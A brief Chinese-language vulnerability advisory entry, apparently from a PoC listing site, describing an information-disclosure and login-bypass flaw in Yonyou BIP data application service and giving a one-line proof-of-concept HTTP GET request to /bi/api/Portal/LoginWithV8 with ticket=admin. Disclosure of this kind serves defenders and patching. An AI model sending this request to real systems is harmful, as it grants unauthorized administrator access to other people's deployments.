用友BIP数据应用服务 /bi/api/Portal/LoginWithV8 信息泄露漏洞

日期: 2025-11-28 | 影响软件: 用友BIP数据应用服务 | POC: 已公开

漏洞描述

用友BIP数据应用服务存在一个信息泄露漏洞,攻击者可以通过特制请求获取敏感信息,达到登录绕过,直接进入后台的目的。

PoC代码

GET /bi/api/Portal/LoginWithV8/?ticket=admin HTTP/1.1

相关漏洞推荐